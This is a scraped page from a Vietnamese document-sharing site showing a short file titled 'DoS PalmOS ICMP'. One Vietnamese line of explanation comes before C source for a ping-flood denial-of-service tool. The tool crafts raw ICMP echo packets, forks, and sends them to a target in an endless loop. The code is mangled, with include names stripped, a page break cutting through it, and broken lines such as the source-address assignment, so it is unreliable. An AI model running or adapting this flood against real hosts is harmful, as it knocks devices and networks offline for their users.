intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

DoS PalmOS ICMP

Chia sẻ: Vietnam 9h | Ngày: | Loại File: DOC | Số trang:2

48
lượt xem
1
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Để khai thác lỗi này, bạn cần liên tiếp gửi gói ICMP_ECHO, mà không chờ hồi âm (bằng fork()'s).  #include  

Chủ đề:
Lưu

Nội dung Text: DoS PalmOS ICMP

  1. DoS PalmOS ICMP trang này đã được đọc  lần  Để khai thác lỗi này, bạn cần liên tiếp gửi gói ICMP_ECHO, mà không chờ hồi âm (bằng fork()'s).  #include   #include   #include   #include   #include   #include   int main(int argc, char *argv[]) {         if(argc 
  2. *)host­>h_addr);         ip­>ihl = 5;         ip­>id = htons(1337);         ip­>ttl = 255;         ip­>tos = 0;         ip­>protocol = IPPROTO_ICMP;         ip­>version = 4;         ip­>frag_off = 0;         ip­>saddr = htons("127.0");         ip­>daddr = inet_ntoa(dest.sin_addr);         ip­>tot_len = sizeof(struct iphdr) +  sizeof(struct icmphdr);         ip­>check = 0;         icmp­>checksum = 0;         icmp­>type = ICMP_ECHO;         icmp­>code = 0;         printf("Ping flooding %s!\n", argv[1]);         fork();         fork();         while(1) {                 sendto(sock, packet, ip­>tot_len, 0,  (struct sockaddr *)&dest, sizeof(struct sockaddr));         }         return(0);  }             
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2